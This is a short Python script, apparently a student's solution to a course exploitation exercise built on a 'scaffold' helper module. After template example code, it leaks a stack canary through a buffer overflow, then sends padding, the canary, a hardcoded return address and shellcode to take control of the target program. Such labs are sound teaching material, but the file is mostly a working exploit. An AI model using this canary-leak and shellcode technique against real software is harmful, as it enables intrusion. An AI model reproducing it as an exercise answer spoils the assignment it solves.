#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE STARTS HERE ###

# Program start:
p.start()

# Example send:
p.send('test\\x41\n')

# Example receive:
assert p.recv(6) == 'testA\n'

### YOUR CODE ENDS HERE ###
p.send('A' * 12 + '\\x' + '\n')
foo = p.recvline()
canary = foo[13:17]
p.send('A' * 32 + canary + 'A' * 12 + '\xb0\xd7\xff\xff' + SHELLCODE + '\n')
